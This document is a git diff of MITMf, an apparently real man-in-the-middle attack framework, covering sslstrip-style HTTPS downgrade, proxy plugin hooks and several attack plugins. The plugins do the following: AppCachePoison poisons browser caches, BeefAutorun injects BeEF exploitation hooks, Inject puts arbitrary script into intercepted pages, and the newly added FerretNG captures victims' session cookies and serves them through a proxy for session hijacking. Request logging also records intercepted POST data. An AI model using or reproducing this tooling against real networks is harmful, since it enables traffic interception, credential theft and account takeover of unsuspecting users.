# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import re
|
||||
import os
|
||||
import logging
|
||||
|
||||
mitmf_logger = logging.getLogger('mimtf')
|
||||
|
||||
class URLMonitor:
|
||||
|
||||
'''
|
||||
The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
|
||||
server is expecting over SSL. It also keeps track of secure favicon urls.
|
||||
'''
|
||||
|
||||
# Start the arms race, and end up here...
|
||||
javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
|
||||
cookies = dict()
|
||||
_instance = None
|
||||
|
||||
def __init__(self):
|
||||
self.strippedURLs = set()
|
||||
self.strippedURLPorts = dict()
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
if URLMonitor._instance == None:
|
||||
URLMonitor._instance = URLMonitor()
|
||||
|
||||
return URLMonitor._instance
|
||||
|
||||
def isSecureLink(self, client, url):
|
||||
for expression in URLMonitor.javascriptTrickery:
|
||||
if (re.match(expression, url)):
|
||||
return True
|
||||
|
||||
return (client,url) in self.strippedURLs
|
||||
|
||||
def getSecurePort(self, client, url):
|
||||
if (client,url) in self.strippedURLs:
|
||||
return self.strippedURLPorts[(client,url)]
|
||||
else:
|
||||
return 443
|
||||
|
||||
def addSecureLink(self, client, url):
|
||||
methodIndex = url.find("//") + 2
|
||||
method = url[0:methodIndex]
|
||||
|
||||
pathIndex = url.find("/", methodIndex)
|
||||
if pathIndex is -1:
|
||||
pathIndex = len(url)
|
||||
url += "/"
|
||||
|
||||
host = url[methodIndex:pathIndex].lower()
|
||||
path = url[pathIndex:]
|
||||
|
||||
port = 443
|
||||
portIndex = host.find(":")
|
||||
|
||||
if (portIndex != -1):
|
||||
host = host[0:portIndex]
|
||||
port = host[portIndex+1:]
|
||||
if len(port) == 0:
|
||||
port = 443
|
||||
|
||||
url = method + host + path
|
||||
|
||||
self.strippedURLs.add((client, url))
|
||||
self.strippedURLPorts[(client, url)] = int(port)
|
|
@ -1,106 +0,0 @@
|
|||
"""Public Suffix List module for Python.
|
||||
"""
|
||||
|
||||
import codecs
|
||||
import os.path
|
||||
|
||||
class PublicSuffixList(object):
|
||||
def __init__(self, input_file=None):
|
||||
"""Reads and parses public suffix list.
|
||||
|
||||
input_file is a file object or another iterable that returns
|
||||
lines of a public suffix list file. If input_file is None, an
|
||||
UTF-8 encoded file named "publicsuffix.txt" in the same
|
||||
directory as this Python module is used.
|
||||
|
||||
The file format is described at http://publicsuffix.org/list/
|
||||
"""
|
||||
|
||||
if input_file is None:
|
||||
input_path = os.path.join(os.path.dirname(__file__), 'publicsuffix.txt')
|
||||
input_file = codecs.open(input_path, "r", "utf8")
|
||||
|
||||
root = self._build_structure(input_file)
|
||||
self.root = self._simplify(root)
|
||||
|
||||
def _find_node(self, parent, parts):
|
||||
if not parts:
|
||||
return parent
|
||||
|
||||
if len(parent) == 1:
|
||||
parent.append({})
|
||||
|
||||
assert len(parent) == 2
|
||||
negate, children = parent
|
||||
|
||||
child = parts.pop()
|
||||
|
||||
child_node = children.get(child, None)
|
||||
|
||||
if not child_node:
|
||||
children[child] = child_node = [0]
|
||||
|
||||
return self._find_node(child_node, parts)
|
||||
|
||||
def _add_rule(self, root, rule):
|
||||
if rule.startswith('!'):
|
||||
negate = 1
|
||||
rule = rule[1:]
|
||||
else:
|
||||
negate = 0
|
||||
|
||||
parts = rule.split('.')
|
||||
self._find_node(root, parts)[0] = negate
|
||||
|
||||
def _simplify(self, node):
|
||||
if len(node) == 1:
|
||||
return node[0]
|
||||
|
||||
return (node[0], dict((k, self._simplify(v)) for (k, v) in node[1].items()))
|
||||
|
||||
def _build_structure(self, fp):
|
||||
root = [0]
|
||||
|
||||
for line in fp:
|
||||
line = line.strip()
|
||||
if line.startswith('//') or not line:
|
||||
continue
|
||||
|
||||
self._add_rule(root, line.split()[0].lstrip('.'))
|
||||
|
||||
return root
|
||||
|
||||
def _lookup_node(self, matches, depth, parent, parts):
|
||||
if parent in (0, 1):
|
||||
negate = parent
|
||||
children = None
|
||||
else:
|
||||
negate, children = parent
|
||||
|
||||
matches[-depth] = negate
|
||||
|
||||
if depth < len(parts) and children:
|
||||
for name in ('*', parts[-depth]):
|
||||
child = children.get(name, None)
|
||||
if child is not None:
|
||||
self._lookup_node(matches, depth+1, child, parts)
|
||||
|
||||
def get_public_suffix(self, domain):
|
||||
"""get_public_suffix("www.example.com") -> "example.com"
|
||||
|
||||
Calling this function with a DNS name will return the
|
||||
public suffix for that name.
|
||||
|
||||
Note that for internationalized domains the list at
|
||||
http://publicsuffix.org uses decoded names, so it is
|
||||
up to the caller to decode any Punycode-encoded names.
|
||||
"""
|
||||
|
||||
parts = domain.lower().lstrip('.').split('.')
|
||||
hits = [None] * len(parts)
|
||||
|
||||
self._lookup_node(hits, 1, self.root, parts)
|
||||
|
||||
for i, what in enumerate(hits):
|
||||
if what is not None and what == 0:
|
||||
return '.'.join(parts[i:])
|
File diff suppressed because it is too large
Load diff
|
@ -42,6 +42,10 @@ class ProxyPlugins:
|
|||
in handleResponse, but is still annoying.
|
||||
'''
|
||||
_instance = None
|
||||
|
||||
plist = []
|
||||
mthdDict = {"connectionMade": "clientRequest", "handleResponse": "serverResponse", "handleHeader": "serverHeaders", "handleEndHeaders":"serverHeaders"}
|
||||
pmthds = {}
|
||||
|
||||
@staticmethod
|
||||
def getInstance():
|
||||
|
@ -50,13 +54,9 @@ class ProxyPlugins:
|
|||
|
||||
return ProxyPlugins._instance
|
||||
|
||||
def setPlugins(self,plugins):
|
||||
def setPlugins(self, plugins):
|
||||
'''Set the plugins in use'''
|
||||
self.plist = []
|
||||
|
||||
#build a lookup list
|
||||
#need to clean up in future
|
||||
self.pmthds = {}
|
||||
|
||||
for p in plugins:
|
||||
self.addPlugin(p)
|
||||
|
||||
|
@ -66,17 +66,17 @@ class ProxyPlugins:
|
|||
'''Load a plugin'''
|
||||
self.plist.append(p)
|
||||
mitmf_logger.debug("[ProxyPlugins] Adding {} plugin".format(p.name))
|
||||
for mthd in p.implements:
|
||||
for mthd,pmthd in self.mthdDict.iteritems():
|
||||
try:
|
||||
self.pmthds[mthd].append(getattr(p,mthd))
|
||||
self.pmthds[mthd].append(getattr(p,pmthd))
|
||||
except KeyError:
|
||||
self.pmthds[mthd] = [getattr(p,mthd)]
|
||||
self.pmthds[mthd] = [getattr(p,pmthd)]
|
||||
|
||||
def removePlugin(self,p):
|
||||
'''Unload a plugin'''
|
||||
self.plist.remove(p)
|
||||
mitmf_logger.debug("[ProxyPlugins] Removing {} plugin".format(p.name))
|
||||
for mthd in p.implements:
|
||||
for mthd,pmthd in self.mthdDict.iteritems():
|
||||
self.pmthds[mthd].remove(p)
|
||||
|
||||
def hook(self):
|
||||
|
@ -92,9 +92,15 @@ class ProxyPlugins:
|
|||
args[key] = values[key]
|
||||
|
||||
#prevent self conflict
|
||||
args['request'] = args['self']
|
||||
if (fname == "handleResponse") or (fname == "handleHeader") or (fname == "handleEndHeaders"):
|
||||
args['request'] = args['self']
|
||||
args['response'] = args['self'].client
|
||||
else:
|
||||
args['request'] = args['self']
|
||||
|
||||
del args['self']
|
||||
|
||||
mitmf_logger.debug("[ProxyPlugins] hooking {}()".format(fname))
|
||||
#calls any plugin that has this hook
|
||||
try:
|
||||
for f in self.pmthds[fname]:
|
||||
|
|
|
@ -16,7 +16,13 @@
|
|||
# USA
|
||||
#
|
||||
|
||||
import urlparse, logging, os, sys, random, re, dns.resolver
|
||||
import urlparse
|
||||
import logging
|
||||
import os
|
||||
import sys
|
||||
import random
|
||||
import re
|
||||
import dns.resolver
|
||||
|
||||
from twisted.web.http import Request
|
||||
from twisted.web.http import HTTPChannel
|
||||
|
@ -33,7 +39,6 @@ from SSLServerConnection import SSLServerConnection
|
|||
from URLMonitor import URLMonitor
|
||||
from CookieCleaner import CookieCleaner
|
||||
from DnsCache import DnsCache
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
|
@ -52,7 +57,6 @@ class ClientRequest(Request):
|
|||
self.hsts = URLMonitor.getInstance().hsts
|
||||
self.cookieCleaner = CookieCleaner.getInstance()
|
||||
self.dnsCache = DnsCache.getInstance()
|
||||
self.plugins = ProxyPlugins.getInstance()
|
||||
#self.uniqueId = random.randint(0, 10000)
|
||||
|
||||
#Use are own DNS server instead of reactor.resolve()
|
||||
|
@ -62,9 +66,6 @@ class ClientRequest(Request):
|
|||
def cleanHeaders(self):
|
||||
headers = self.getAllHeaders().copy()
|
||||
|
||||
#for k,v in headers.iteritems():
|
||||
# mitmf_logger.debug("[ClientRequest] Receiving headers: (%s => %s)" % (k, v))
|
||||
|
||||
if self.hsts:
|
||||
|
||||
if 'referer' in headers:
|
||||
|
@ -92,8 +93,6 @@ class ClientRequest(Request):
|
|||
if 'cache-control' in headers:
|
||||
del headers['cache-control']
|
||||
|
||||
self.plugins.hook()
|
||||
|
||||
return headers
|
||||
|
||||
def getPathFromUri(self):
|
||||
|
@ -111,7 +110,7 @@ class ClientRequest(Request):
|
|||
|
||||
if os.path.exists(scriptPath): return scriptPath
|
||||
|
||||
mitmf_logger.warning("Error: Could not find lock.ico")
|
||||
mitmf_logger.warning("[ClientRequest] Error: Could not find lock.ico")
|
||||
return "lock.ico"
|
||||
|
||||
def handleHostResolvedSuccess(self, address):
|
||||
|
|
|
@ -16,14 +16,16 @@
|
|||
# USA
|
||||
#
|
||||
|
||||
import logging, re, string, random, zlib, gzip, StringIO, sys
|
||||
import plugins
|
||||
|
||||
try:
|
||||
from user_agents import parse
|
||||
except:
|
||||
pass
|
||||
import logging
|
||||
import re
|
||||
import string
|
||||
import random
|
||||
import zlib
|
||||
import gzip
|
||||
import StringIO
|
||||
import sys
|
||||
|
||||
from user_agents import parse
|
||||
from twisted.web.http import HTTPClient
|
||||
from URLMonitor import URLMonitor
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
@ -53,6 +55,7 @@ class ServerConnection(HTTPClient):
|
|||
self.postData = postData
|
||||
self.headers = headers
|
||||
self.client = client
|
||||
self.printPostData = True
|
||||
self.clientInfo = None
|
||||
self.urlMonitor = URLMonitor.getInstance()
|
||||
self.hsts = URLMonitor.getInstance().hsts
|
||||
|
@ -78,22 +81,17 @@ class ServerConnection(HTTPClient):
|
|||
mitmf_logger.info(self.clientInfo + "Sending Request: {}".format(self.headers['host']))
|
||||
mitmf_logger.debug("[ServerConnection] Full request: {}{}".format(self.headers['host'], self.uri))
|
||||
|
||||
self.plugins.hook()
|
||||
self.sendCommand(self.command, self.uri)
|
||||
|
||||
def sendHeaders(self):
|
||||
for header, value in self.headers.iteritems():
|
||||
mitmf_logger.debug("[ServerConnection] Sending header: ({} => {})".format(header, value))
|
||||
mitmf_logger.debug("[ServerConnection] Sending header: ({}: {})".format(header, value))
|
||||
self.sendHeader(header, value)
|
||||
|
||||
self.endHeaders()
|
||||
|
||||
def sendPostData(self):
|
||||
if 'clientprfl' in self.uri:
|
||||
self.plugins.hook()
|
||||
elif 'keylog' in self.uri:
|
||||
self.plugins.hook()
|
||||
else:
|
||||
if self.printPostData is True: #So we can disable printing POST data coming from plugins
|
||||
try:
|
||||
postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging
|
||||
if len(postdata) > 0:
|
||||
|
@ -101,8 +99,9 @@ class ServerConnection(HTTPClient):
|
|||
except UnicodeDecodeError and UnicodeEncodeError:
|
||||
mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host']))
|
||||
pass
|
||||
|
||||
self.transport.write(self.postData)
|
||||
|
||||
self.printPostData = True
|
||||
self.transport.write(self.postData)
|
||||
|
||||
def connectionMade(self):
|
||||
mitmf_logger.debug("[ServerConnection] HTTP connection made.")
|
||||
|
@ -118,8 +117,6 @@ class ServerConnection(HTTPClient):
|
|||
self.client.setResponseCode(int(code), message)
|
||||
|
||||
def handleHeader(self, key, value):
|
||||
mitmf_logger.debug("[ServerConnection] Receiving header ({}: {})".format(key, value))
|
||||
|
||||
if (key.lower() == 'location'):
|
||||
value = self.replaceSecureLinks(value)
|
||||
if self.app:
|
||||
|
@ -128,11 +125,11 @@ class ServerConnection(HTTPClient):
|
|||
if (key.lower() == 'content-type'):
|
||||
if (value.find('image') != -1):
|
||||
self.isImageRequest = True
|
||||
mitmf_logger.debug("[ServerConnection] Response is image content, not scanning...")
|
||||
mitmf_logger.debug("[ServerConnection] Response is image content, not scanning")
|
||||
|
||||
if (key.lower() == 'content-encoding'):
|
||||
if (value.find('gzip') != -1):
|
||||
mitmf_logger.debug("[ServerConnection] Response is compressed...")
|
||||
mitmf_logger.debug("[ServerConnection] Response is compressed")
|
||||
self.isCompressed = True
|
||||
|
||||
elif (key.lower()== 'strict-transport-security'):
|
||||
|
@ -147,15 +144,19 @@ class ServerConnection(HTTPClient):
|
|||
else:
|
||||
self.client.setHeader(key, value)
|
||||
|
||||
def handleEndHeaders(self):
|
||||
if (self.isImageRequest and self.contentLength != None):
|
||||
self.client.setHeader("Content-Length", self.contentLength)
|
||||
|
||||
if self.length == 0:
|
||||
self.shutdown()
|
||||
|
||||
self.plugins.hook()
|
||||
|
||||
def handleEndHeaders(self):
|
||||
if (self.isImageRequest and self.contentLength != None):
|
||||
self.client.setHeader("Content-Length", self.contentLength)
|
||||
if logging.getLevelName(mitmf_logger.getEffectiveLevel()) == "DEBUG":
|
||||
for header, value in self.client.headers.iteritems():
|
||||
mitmf_logger.debug("[ServerConnection] Receiving header: ({}: {})".format(header, value))
|
||||
|
||||
if self.length == 0:
|
||||
self.shutdown()
|
||||
|
||||
def handleResponsePart(self, data):
|
||||
if (self.isImageRequest):
|
||||
self.client.write(data)
|
||||
|
@ -175,15 +176,11 @@ class ServerConnection(HTTPClient):
|
|||
if (self.isCompressed):
|
||||
mitmf_logger.debug("[ServerConnection] Decompressing content...")
|
||||
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
|
||||
|
||||
if len(data) < 1500:
|
||||
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data:\n{}".format(len(data), data))
|
||||
else:
|
||||
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
|
||||
|
||||
data = self.replaceSecureLinks(data)
|
||||
res = self.plugins.hook()
|
||||
data = res['data']
|
||||
data = self.plugins.hook()['data']
|
||||
|
||||
mitmf_logger.debug("[ServerConnection] Read from server {} bytes of data".format(len(data)))
|
||||
|
||||
if (self.contentLength != None):
|
||||
self.client.setHeader('Content-Length', len(data))
|
||||
|
@ -212,7 +209,7 @@ class ServerConnection(HTTPClient):
|
|||
for match in iterator:
|
||||
url = match.group()
|
||||
|
||||
mitmf_logger.debug("[ServerConnection] Found secure reference: " + url)
|
||||
mitmf_logger.debug("[ServerConnection][HSTS] Found secure reference: " + url)
|
||||
nuevaurl=self.urlMonitor.addSecureLink(self.client.getClientIP(), url)
|
||||
mitmf_logger.debug("[ServerConnection][HSTS] Replacing {} => {}".format(url,nuevaurl))
|
||||
sustitucion[url] = nuevaurl
|
||||
|
|
|
@ -30,51 +30,6 @@ from scapy.all import get_if_addr, get_if_hwaddr
|
|||
|
||||
mitmf_logger = logging.getLogger('mitmf')
|
||||
|
||||
class ImportDir:
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
# http://gitlab.com/aurelien-lourot/importdir
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
|
||||
# File name of a module:
|
||||
__module_file_regexp = "(.+)\.py(c?)$"
|
||||
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
# Interface
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
|
||||
def do(self, path, env):
|
||||
""" Imports all modules residing directly in directory "path" into the provided environment
|
||||
(usually the callers environment). A typical call:
|
||||
importdir.do("example_dir", globals())
|
||||
"""
|
||||
self.__do(path, env)
|
||||
|
||||
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
# Implementation
|
||||
#---------------------------------------------------------------------------------------------------
|
||||
|
||||
def get_module_names_in_dir(self, path):
|
||||
""" Returns a set of all module names residing directly in directory "path".
|
||||
"""
|
||||
result = set()
|
||||
|
||||
# Looks for all python files in the directory (not recursively) and add their name to result:
|
||||
for entry in os.listdir(path):
|
||||
if os.path.isfile(os.path.join(path, entry)):
|
||||
regexp_result = re.search(self.__module_file_regexp, entry)
|
||||
if regexp_result: # is a module file name
|
||||
result.add(regexp_result.groups()[0])
|
||||
|
||||
return result
|
||||
|
||||
def __do(self, path, env):
|
||||
""" Implements do().
|
||||
"""
|
||||
sys.path.append(path) # adds provided directory to list we can import from
|
||||
for module_name in sorted(self.get_module_names_in_dir(path)): # for each found module...
|
||||
env[module_name] = __import__(module_name) # ... import
|
||||
|
||||
class SystemConfig:
|
||||
|
||||
@staticmethod
|
||||
|
|
10
mitmf.py
10
mitmf.py
|
@ -83,7 +83,7 @@ try:
|
|||
sgroup.add_argument("--{}".format(p.optname), action="store_true",help="Load plugin {}".format(p.name))
|
||||
|
||||
if p.has_opts:
|
||||
p.add_options(sgroup)
|
||||
p.pluginOptions(sgroup)
|
||||
|
||||
arg_dict[p.optname] = vars(sgroup)['_group_actions']
|
||||
|
||||
|
@ -101,10 +101,10 @@ args = parser.parse_args()
|
|||
for plugin, options in arg_dict.iteritems():
|
||||
if vars(args)[plugin] is False:
|
||||
for option in options:
|
||||
if vars(args)[option.dest] is True:
|
||||
sys.exit("[-] Called plugin options without invoking --{}".format(plugin))
|
||||
if vars(args)[option.dest]:
|
||||
sys.exit("[-] Called plugin options without invoking the actual plugin (--{})".format(plugin))
|
||||
|
||||
#first check to see if we supplied a valid interface
|
||||
#check to see if we supplied a valid interface
|
||||
myip = SystemConfig.getIP(args.interface)
|
||||
mymac = SystemConfig.getMAC(args.interface)
|
||||
|
||||
|
@ -181,7 +181,7 @@ from core.dnschef.DNSchef import DNSChef
|
|||
DNSChef.getInstance().start()
|
||||
print "|_ DNSChef v{} online".format(DNSChef.version)
|
||||
|
||||
#start the SMB server
|
||||
#Start the SMB server
|
||||
from core.protocols.smb.SMBserver import SMBserver
|
||||
print "|_ SMBserver online (Impacket {})\n".format(SMBserver.impacket_ver)
|
||||
SMBserver().start()
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
# Copyright (c) 2014-2016 Krzysztof Kotowicz, Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
|
@ -18,8 +18,6 @@
|
|||
# USA
|
||||
#
|
||||
|
||||
# 99.9999999% of this code was stolen from https://github.com/koto/sslstrip by Krzysztof Kotowicz
|
||||
|
||||
import logging
|
||||
import re
|
||||
import os.path
|
||||
|
@ -33,10 +31,9 @@ from core.sslstrip.URLMonitor import URLMonitor
|
|||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class AppCachePlugin(Plugin):
|
||||
name = "App Cache Poison"
|
||||
name = "AppCachePoison"
|
||||
optname = "appoison"
|
||||
desc = "Performs App Cache Poisoning attacks"
|
||||
implements = ["handleResponse"]
|
||||
version = "0.3"
|
||||
has_opts = False
|
||||
|
||||
|
@ -47,7 +44,9 @@ class AppCachePlugin(Plugin):
|
|||
|
||||
self.urlMonitor.setAppCachePoisoning()
|
||||
|
||||
def handleResponse(self, request, data):
|
||||
def serverResponse(self, response, request, data):
|
||||
|
||||
#This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future
|
||||
|
||||
self.app_config = self.config['AppCachePoison'] # so we reload the config on each request
|
||||
url = request.client.uri
|
||||
|
@ -60,22 +59,22 @@ class AppCachePlugin(Plugin):
|
|||
if "enable_only_in_useragents" in self.app_config:
|
||||
regexp = self.app_config["enable_only_in_useragents"]
|
||||
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
||||
mitmf_logger.info("%s Tampering disabled in this useragent (%s)" % (ip, req_headers["user-agent"]))
|
||||
return {'request': request, 'data': data}
|
||||
mitmf_logger.info("{} [{}] Tampering disabled in this useragent ({})".format(ip, self.name, req_headers["user-agent"]))
|
||||
return {'response': response, 'request': request, 'data': data}
|
||||
|
||||
urls = self.urlMonitor.getRedirectionSet(url)
|
||||
mitmf_logger.debug("%s [AppCachePoison] Got redirection set: %s" % (ip, urls))
|
||||
mitmf_logger.debug("{} [{}] Got redirection set: {}".format(ip,self.name, urls))
|
||||
(name,s,element,url) = self.getSectionForUrls(urls)
|
||||
|
||||
if s is False:
|
||||
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
||||
return {'request': request, 'data': data}
|
||||
return {'response': response, 'request': request, 'data': data}
|
||||
|
||||
mitmf_logger.info("%s Found URL %s in section %s" % (ip, url, name))
|
||||
mitmf_logger.info("{} [{}] Found URL {} in section {}".format(ip, self.name, url, name))
|
||||
p = self.getTemplatePrefix(s)
|
||||
|
||||
if element == 'tamper':
|
||||
mitmf_logger.info("%s Poisoning tamper URL with template %s" % (ip, p))
|
||||
mitmf_logger.info("{} [{}] Poisoning tamper URL with template {}".format(ip, self.name, p))
|
||||
if os.path.exists(p + '.replace'): # replace whole content
|
||||
f = open(p + '.replace','r')
|
||||
data = self.decorate(f.read(), s)
|
||||
|
@ -92,12 +91,12 @@ class AppCachePlugin(Plugin):
|
|||
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
|
||||
|
||||
elif element == "manifest":
|
||||
mitmf_logger.info("%s Poisoning manifest URL" % ip)
|
||||
mitmf_logger.info("{} [{}] Poisoning manifest URL".format(ip, self.name))
|
||||
data = self.getSpoofedManifest(url, s)
|
||||
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
||||
|
||||
elif element == "raw": # raw resource to modify, it does not have to be html
|
||||
mitmf_logger.info("%s Poisoning raw URL" % ip)
|
||||
mitmf_logger.info("{} [{}] Poisoning raw URL".format(ip, self.name))
|
||||
if os.path.exists(p + '.replace'): # replace whole content
|
||||
f = open(p + '.replace','r')
|
||||
data = self.decorate(f.read(), s)
|
||||
|
@ -112,7 +111,7 @@ class AppCachePlugin(Plugin):
|
|||
|
||||
self.cacheForFuture(headers)
|
||||
self.removeDangerousHeaders(headers)
|
||||
return {'request': request, 'data': data}
|
||||
return {'response': response, 'request': request, 'data': data}
|
||||
|
||||
def tryMassPoison(self, url, data, headers, req_headers, ip):
|
||||
browser_id = ip + req_headers.get("user-agent", "")
|
||||
|
@ -130,7 +129,7 @@ class AppCachePlugin(Plugin):
|
|||
if not re.search(self.app_config['mass_poison_url_match'], url): #different url
|
||||
return data
|
||||
|
||||
mitmf_logger.debug("Adding AppCache mass poison for URL %s, id %s" % (url, browser_id))
|
||||
mitmf_logger.debug("[{}] Adding AppCache mass poison for URL {}, id {}".format(self.name, url, browser_id))
|
||||
appendix = self.getMassPoisonHtml()
|
||||
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
||||
self.mass_poisoned_browsers.append(browser_id) # mark to avoid mass spoofing for this ip
|
||||
|
@ -202,5 +201,3 @@ class AppCachePlugin(Plugin):
|
|||
return (name, section, 'raw',url)
|
||||
|
||||
return (None, False,'',urls.copy().pop())
|
||||
|
||||
|
||||
|
|
|
@ -27,15 +27,15 @@ from core.beefapi import BeefAPI
|
|||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.Inject import Inject
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
||||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class BeefAutorun(Inject, Plugin):
|
||||
class BeefAutorun(Plugin):
|
||||
name = "BeEFAutorun"
|
||||
optname = "beefauto"
|
||||
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
|
||||
tree_output = []
|
||||
depends = ["Inject"]
|
||||
version = "0.3"
|
||||
has_opts = False
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
|
@ -18,28 +18,28 @@
|
|||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
from plugins.plugin import Plugin
|
||||
|
||||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class CacheKill(Plugin):
|
||||
name = "CacheKill"
|
||||
optname = "cachekill"
|
||||
desc = "Kills page caching by modifying headers"
|
||||
implements = ["handleHeader", "connectionMade"]
|
||||
bad_headers = ['if-none-match', 'if-modified-since']
|
||||
version = "0.1"
|
||||
has_opts = True
|
||||
|
||||
def add_options(self, options):
|
||||
options.add_argument("--preserve-cookies", action="store_true", help="Preserve cookies (will allow caching in some situations).")
|
||||
def initialize(self, options):
|
||||
self.bad_headers = ['if-none-match', 'if-modified-since']
|
||||
|
||||
def handleHeader(self, request, key, value):
|
||||
def serverHeaders(self, response, request):
|
||||
'''Handles all response headers'''
|
||||
request.client.headers['Expires'] = "0"
|
||||
request.client.headers['Cache-Control'] = "no-cache"
|
||||
response.headers['Expires'] = "0"
|
||||
response.headers['Cache-Control'] = "no-cache"
|
||||
|
||||
def connectionMade(self, request):
|
||||
def clientRequest(self, request):
|
||||
'''Handles outgoing request'''
|
||||
request.headers['Pragma'] = 'no-cache'
|
||||
for h in self.bad_headers:
|
||||
if h in request.headers:
|
||||
request.headers[h] = ""
|
||||
request.headers['pragma'] = 'no-cache'
|
||||
for header in self.bad_headers:
|
||||
if header in request.headers:
|
||||
del request.headers[header]
|
60
plugins/FerretNG.py
Normal file
60
plugins/FerretNG.py
Normal file
|
@ -0,0 +1,60 @@
|
|||
#!/usr/bin/env python2.7
|
||||
|
||||
# Copyright (c) 2014-2016 Marcello Salvati
|
||||
#
|
||||
# This program is free software; you can redistribute it and/or
|
||||
# modify it under the terms of the GNU General Public License as
|
||||
# published by the Free Software Foundation; either version 3 of the
|
||||
# License, or (at your option) any later version.
|
||||
#
|
||||
# This program is distributed in the hope that it will be useful, but
|
||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
# General Public License for more details.
|
||||
#
|
||||
# You should have received a copy of the GNU General Public License
|
||||
# along with this program; if not, write to the Free Software
|
||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||
# USA
|
||||
#
|
||||
|
||||
import logging
|
||||
|
||||
from plugins.plugin import Plugin
|
||||
from twisted.internet import reactor
|
||||
from twisted.web import http
|
||||
from twisted.internet import reactor
|
||||
from core.ferretNG.FerretProxy import FerretProxy
|
||||
from core.ferretNG.URLMonitor import URLMonitor
|
||||
|
||||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class FerretNG(Plugin):
|
||||
name = "Ferret-NG"
|
||||
optname = "ferret"
|
||||
desc = "Captures cookies and starts a proxy that will feed them to connected clients"
|
||||
tree_output = list()
|
||||
version = "0.1"
|
||||
has_opts = True
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.ferret_port = 10010 or options.ferret_port
|
||||
|
||||
self.tree_output.append("Listening on port {}".format(self.ferret_port))
|
||||
|
||||
def clientRequest(self, request):
|
||||
if 'cookie' in request.headers:
|
||||
host = request.headers['host']
|
||||
cookie = request.headers['cookie']
|
||||
mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(request.client.getClientIP(), host, cookie))
|
||||
URLMonitor.getInstance().cookies[host] = cookie
|
||||
|
||||
def pluginReactor(self, StrippingProxy):
|
||||
FerretFactory = http.HTTPFactory(timeout=10)
|
||||
FerretFactory.protocol = FerretProxy
|
||||
reactor.listenTCP(self.ferret_port, FerretFactory)
|
||||
|
||||
def pluginOptions(self, options):
|
||||
options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG on (default 10010)')
|
|
@ -27,22 +27,21 @@ import argparse
|
|||
from core.utils import SystemConfig
|
||||
from plugins.plugin import Plugin
|
||||
from plugins.CacheKill import CacheKill
|
||||
from core.sergioproxy.ProxyPlugins import ProxyPlugins
|
||||
|
||||
mitmf_logger = logging.getLogger("mitmf")
|
||||
|
||||
class Inject(CacheKill, Plugin):
|
||||
class Inject(Plugin):
|
||||
name = "Inject"
|
||||
optname = "inject"
|
||||
implements = ["handleResponse", "handleHeader", "connectionMade"]
|
||||
has_opts = True
|
||||
desc = "Inject arbitrary content into HTML content"
|
||||
version = "0.2"
|
||||
depends = ["CacheKill"]
|
||||
has_opts = True
|
||||
|
||||
def initialize(self, options):
|
||||
'''Called if plugin is enabled, passed the options namespace'''
|
||||
self.options = options
|
||||
self.proxyip = SystemConfig.getIP(options.interface)
|
||||
self.our_ip = SystemConfig.getIP(options.interface)
|
||||
self.html_src = options.html_url
|
||||
self.js_src = options.js_url
|
||||
self.rate_limit = options.rate_limit
|
||||
|
@ -50,35 +49,32 @@ class Inject(CacheKill, Plugin):
|
|||
self.per_domain = options.per_domain
|
||||
self.black_ips = options.black_ips
|
||||
